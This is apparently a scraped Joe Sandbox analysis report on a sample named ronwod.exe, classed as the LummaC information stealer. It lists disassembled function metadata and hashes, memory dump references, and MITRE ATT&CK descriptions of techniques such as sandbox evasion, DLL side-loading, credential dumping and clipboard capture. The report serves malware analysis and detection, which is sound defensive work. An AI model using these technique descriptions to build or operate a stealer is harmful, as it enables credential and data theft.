Associated: 00000000.00000002.1973231998.000000000023C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973245888.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_ronwod.jbxd

Similarity

API ID: __p__commode__p__fmode__set_app_type
String ID:
API String ID: 3338496922-0
Opcode ID: 14d0c1d9f9cf7bbb4817ccdd02a7eab637e97c4e4b44e1ddba769a137df93b47
Instruction ID: 61cb3a17e05663cb49e7f57e2e3a5bd383940fd089e1ea162811fb56b4d237b5
Opcode Fuzzy Hash: 14d0c1d9f9cf7bbb4817ccdd02a7eab637e97c4e4b44e1ddba769a137df93b47
Instruction Fuzzy Hash: 4121A2B0524342CFC71CAF20E55936973E1BB00304F548968D8184F655EB7AE9FADBA1

Function 00EC2AF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00EC2B27
GetSystemMetrics.USER32 ref: 00EC2B36

Strings

, xrefs: 00EC2BE4

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 38ad8178c16d373398d7ca9c5a6b640f0ba74e8af45bd4da39edbc5b9789b074
Instruction ID: 7db9eaab0319eb1d50b7acce3df7ef2edf5251cc036be7c66fc48705dae2e17d
Opcode Fuzzy Hash: 38ad8178c16d373398d7ca9c5a6b640f0ba74e8af45bd4da39edbc5b9789b074
Instruction Fuzzy Hash: 623192B09153148FDB00EF69E984649BBF5FF98304F11852EE998EB360D374A958CF82

Function 00233D10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00233D7E

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00233D5F
Unknown error, xrefs: 00233D12

Memory Dump Source

Source File: 00000000.00000002.1973185118.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.1973167124.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973202167.0000000000236000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973217270.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973231998.000000000023C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973245888.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_ronwod.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 77163a9d70974d0b20edae35fb6e418472ff41c7159df4d272887ccda480ae93
Instruction ID: 785b48972576146cab1b52c92212a1dc09f438b769c6a5e30df8c19d9b4d36a9
Opcode Fuzzy Hash: 77163a9d70974d0b20edae35fb6e418472ff41c7159df4d272887ccda480ae93
Instruction Fuzzy Hash: 8201D2B0418B45DBC300AF15E48842AFFF5FF89350F828898E5C946269CB32D8B8CB56

Function 00231296 Relevance: 5.1, APIs: 4, Instructions: 80stringCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 002312EB
strlen.MSVCRT ref: 00231323
malloc.MSVCRT ref: 0023132E
memcpy.MSVCRT ref: 00231344

Memory Dump Source

Source File: 00000000.00000002.1973185118.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.1973167124.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973202167.0000000000236000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973217270.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973231998.000000000023C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973245888.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_ronwod.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 1f7a8dfc3a2abdd4ee4dd5fab56f35f3b5e4f86387f6d540f687c15cccac089a
Instruction ID: a192493bc1d167dea407829a61b0ce57a0661a235950788df8196f8aafa62d26
Opcode Fuzzy Hash: 1f7a8dfc3a2abdd4ee4dd5fab56f35f3b5e4f86387f6d540f687c15cccac089a
Instruction Fuzzy Hash: AB3135B5D147168FCB24DF64E9847A9BBE1FF48300F01856EE948AB311DB35A929CF81

Function 002313BB Relevance: 5.1, APIs: 4, Instructions: 66stringCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 002312EB
strlen.MSVCRT ref: 00231323
malloc.MSVCRT ref: 0023132E
memcpy.MSVCRT ref: 00231344

Memory Dump Source

Source File: 00000000.00000002.1973185118.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.1973167124.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973202167.0000000000236000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973217270.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973231998.000000000023C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973245888.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_ronwod.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 2ddb29fd15bcf481304631936eb65f2111692fc5bace8388c87d9b9e9ee76bb8
Instruction ID: 4bde0b04c68306c26465ef8dcdb534846dc442fc6336c8006409f9bc987c4330
Opcode Fuzzy Hash: 2ddb29fd15bcf481304631936eb65f2111692fc5bace8388c87d9b9e9ee76bb8
Instruction Fuzzy Hash: 0821F5B5D147158FCB14EF24E984669BBF1FB48300F11856EE948AB310DB70A915CF81

Function 00234460 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00234633,?,?,?,?,?,00233C48), ref: 0023446E
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00234633,?,?,?,?,?,00233C48), ref: 00234495
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00234633,?,?,?,?,?,00233C48), ref: 0023449C
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00234633,?,?,?,?,?,00233C48), ref: 002344BC

Memory Dump Source

Source File: 00000000.00000002.1973185118.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.1973167124.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973202167.0000000000236000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973217270.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973231998.000000000023C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973245888.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_ronwod.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 72a14b041a0a8acf547dd10646df216e0641da9d759b4dc92fc6f3f4bd23de91
Instruction ID: c81d12dd9e8f6e2da029e681574b2fa5ecfd6760d335d3072975779d18d04ed5
Opcode Fuzzy Hash: 72a14b041a0a8acf547dd10646df216e0641da9d759b4dc92fc6f3f4bd23de91
Instruction Fuzzy Hash: F4F0A4B59003128BC710BF78E98C61ABBB4EA50310F050078DE889B318D770B898CBA2

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ronwod.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
ronwod.exe

Function 00EB3675 Relevance: 51.8, APIs: 3, Strings: 26, Instructions: 1032
COMMON

Function 0023346D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 373
COMMON

Function 00E9CC75 Relevance: 30.2, Strings: 24, Instructions: 243
COMMON

Function 00EC7CF0 Relevance: 28.6, APIs: 11, Strings: 5, Instructions: 574
memorycomCOMMON

Function 00EA0247 Relevance: 13.0, APIs: 2, Strings: 5, Instructions: 700
COMMON

Function 00E99C6F Relevance: 6.4, Strings: 5, Instructions: 150
COMMON

Function 00EB1570 Relevance: 5.6, Strings: 4, Instructions: 586
COMMON

Function 00EC328C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109
COMMON

Function 00EB6520 Relevance: 4.1, Strings: 3, Instructions: 380
COMMON

Function 00E9A8B0 Relevance: 4.1, Strings: 3, Instructions: 349
COMMON

Function 00E986C0 Relevance: 7.6, APIs: 5, Instructions: 92
threadCOMMON

Function 00E9E042 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 327
COMMON